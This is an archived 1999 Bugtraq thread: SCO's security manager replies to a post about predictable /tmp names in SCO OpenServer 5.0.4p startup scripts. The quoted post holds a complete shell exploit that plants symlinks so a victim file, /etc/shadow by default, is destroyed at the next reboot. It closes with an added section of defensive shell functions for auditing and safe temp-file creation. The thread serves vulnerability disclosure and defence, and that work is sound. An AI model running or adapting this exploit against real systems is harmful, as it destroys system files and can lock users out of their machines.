Bugtraq mailing list archives
Re: Little exploit for startup scripts (SCO 5.0.4p).
From: jonco () SCO com (Jon Coyle)
Date: Mon, 8 Mar 1999 11:58:54 -0000
Leshka,

We have started work on this and are checking all of our OS products to see if they suffer from similar problems. We will make information available at our security pages (http://www.sco.com/security) on how to work around the problem, and will also have fixes available in a few days.

Thanks,
Jon
-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () netspace org] On Behalf Of leshka
Sent: 07 March 1999 12:07
To: BUGTRAQ () netspace org
Subject: Little exploit for startup scripts (SCO 5.0.4p).

#!/bin/sh
#
#              ... The punishment for inobedience ...
#                          (Cycle # 2)
#
# This simple script can help to erase any file
# (SCO OpenServer Enterprise System v 5.0.4p).
# Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete temporary files
# with easily predictable names in "/tmp" directory. Below there are a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
# /bin/rm -f /tmp/rpc.err$$
# ...
# rm -rf /tmp/rpc$$
#
# S95nis:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
# /bin/rm -f /tmp/nis.err$$
# ...
# rm -f /tmp/nis$$
#
# S85tcp:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
# /bin/rm -f /tmp/ps.err$$
# ...
# /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
# /bin/rm -f /tmp/nfs.err$$
# ...
# rm -f /tmp/nfs$$
#
# Every time during the startup such shell scripts create files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot. Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's so simple! Child processes of this script have PID's with values
# slightly over than the parent's PID. A little math and one gets it. Next
# step is creating a few symbolic links to the victim file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S. Looking forward to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
#                              999,99*2
#
#                        ----------------------
#             ---------------------------------------------
#       ----------------- Dedicated to my beautiful lady ------------------
#             ---------------------------------------------
#                        ----------------------
#
# Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
if [ _$1 = "_" ]
then
  {
    echo -n "File to delete [/etc/shadow]:"
    read victim_file
    if [ _$victim_file = "_" ]
    then
      victim_file="/etc/shadow"
    fi
  }
else
  victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
do
  pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
----
Jon Coyle - Manager, Internet Engineering & Secure Technologies   jonco () sco com
SCO Ltd.                  Tel: +44 1923 813656
Croxley Business Park     Fax: +44 1923 813804
Hatters Lane              http://www.sco.com
Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
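The weakness in the quoted rc scripts is a temporary file created under a predictable, world-writable path (`/tmp/<name>$$`) and written through without checking what is already there. The following added example, written for this archive page and not taken from the thread or from SCO, shows the defender's side: a check that flags that pattern in a startup script, and the safer way to create the scratch file. It assumes a shell with `mktemp` and `[ -L ]` available (not the 1999 SCO 5.0.4p shell); the `VULN_FRAGMENT` sample is constructed to mirror the S85tcp excerpt above.

```shell
#!/bin/sh
# Added example (not from the Bugtraq thread): audit startup scripts for
# predictable /tmp names built from $$, and create scratch files safely.

# Constructed sample: a startup-script fragment shaped like the S85tcp
# excerpt quoted in the post. The $$ is kept literal (single quotes).
VULN_FRAGMENT='/bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
/bin/rm -f /tmp/ps.err$$
/bin/rm -f /tmp/tps$$'

# count_predictable_tmp FILE
# Prints the number of lines in FILE that redirect output into /tmp or
# /var/tmp using a name ending in $$ (the pattern the post abuses).
# Only redirects count: the rm -f lines are cleanup, not the exposure.
count_predictable_tmp() {
    grep -c -E '(>|>>)[[:space:]]*/(tmp|var/tmp)/[^[:space:]]*\$\$' "$1" || true
}

# safe_tmpfile
# Creates a scratch file the way the rc scripts should have: a private
# directory (mktemp -d creates it mode 700) plus an unpredictable name
# created exclusively by mktemp, so a pre-planted symlink cannot be
# followed. Prints the path of the new file.
safe_tmpfile() {
    dir=$(mktemp -d) || return 1
    chmod 700 "$dir"
    mktemp "$dir/ps.XXXXXX"
}

# check_not_symlink PATH
# Returns 1 if PATH is already a symbolic link; a script that must write
# to a fixed path should at least refuse to write through a link instead
# of truncating whatever the link points at (what ln -fs in the post relies on).
check_not_symlink() {
    if [ -L "$1" ]; then
        echo "refusing: $1 is a symbolic link" >&2
        return 1
    fi
    return 0
}
```

Running `count_predictable_tmp` over a copy of the real `/etc/rc2.d` scripts gives the inventory the post's P.S. asks SCO to publish; a non-zero count is a script to fix.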